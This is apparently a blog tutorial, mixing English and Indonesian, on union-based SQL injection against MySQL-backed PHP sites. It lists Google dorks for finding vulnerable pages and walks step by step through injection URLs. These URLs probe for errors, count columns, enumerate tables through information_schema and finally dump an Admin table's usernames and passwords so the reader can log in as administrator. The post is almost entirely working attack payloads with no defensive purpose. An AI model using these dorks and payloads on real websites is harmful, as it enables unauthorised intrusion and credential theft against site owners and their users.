Keyword you need to know
-------------------------------
Character : ', -
Comments : /*, --
-------------------------------
Information: "Information_schema" just working our for version 5.x and above
Google Dork that will be used is ->
"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="
-------------------------First Step-------------------------
www.target.com/news.php?id=1
---add the character 'at the end of the url to see if the site is vuln to
sql injection or not.
inject sample code:-
www.target.com/news.php?id=1'
or
www.target.com/news.php?id=-1
Examples of error messages :-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near line 1
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
-------------------------Second Step-------------------------
Find the number of tables available in the database.
Add : +order+by+1-- at the end of url
Contoh:
Code:
www.target.com/news.php?id=1+order+by+1--
atau
www.target.com/news.php?id=1+order+by+1/* check in stages
www.target.com/news.php?id=1+order+by+2/*
www.target.com/news.php?id=1+order+by+3/* keep looking untill error out
For this tutorial table amount obtained was 3.
-------------------------Third Step-------------------------
Use the Union command to remove the numbers that we use later.
order to be used : +union+select+1,2,3-- end of the url
Example
www.target.com/news.php?id=1+union+select+1,2,3--
Example: number 2 out.
then we enter the version() in number (2),
Example:
www.target.com/news.php?id=1+union+select+1,version(),3--
and the display version will appear in the figures.
Example:
5.1.47-community-log
------
|info|
------
version() = to see msql version used
database() = to see the database name used
-------------------------Fourth Step-------------------------
to see, the names of the table that is in the web, order
table_name park in the figures that came out earlier -> (2)
+from+information_schema.tables-- ---> park behind the last digit.
Example:
www.target.com/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
or we add the command character- in front of the first digit
www.target.com/news.php?id=-1+union+select+1,table_name,3+from+information_schema.tables--
-------------------------Step Fifth-------------------------
Remove all content is in the table,
group_concat(table_name) ---> park in the figures that came out earlier (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Put after the last digit.
Contoh:
www.target.com/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
-------------------------Step Sixth-------------------------
Exit right content is in TABLE
group_concat(column_name) ---> park in the figures that came out earlier (2)
+from+information_schema.columns+where+table_name=0xResulOfConvertedTextTableAdmin--
(TABLE NAME HAS BEEN PUT IN TO CONVERT HEXADECIMEL)
------
|info|
------
Website that can be used to convert the table name to hexadecimel
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
Column which we will use as example the table ADMIN
and convert results are 41444D494E
Example:
www.target.com/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
-------------------------Step Seven-------------------------
Remove the contents of the results that we managed to get from table Admin
concat_ws(0x3a,"column names contained in the table ADMIN") ---> park in the figures that came out earlier (2)
+from+Admin-- --> The original column
Contoh:
www.target.com/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+Admin--
And we obtain the username and password admin for the website.
Then You Has o Find The Admin Login :)....
More Short Tutorial:-
http://pastebin.com/pVVjSzhF
No comments:
Post a Comment